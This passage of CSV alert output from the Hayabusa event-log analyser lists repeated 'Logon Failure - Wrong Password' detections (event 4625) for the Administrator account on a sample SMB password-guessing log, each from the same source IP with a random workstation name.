NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
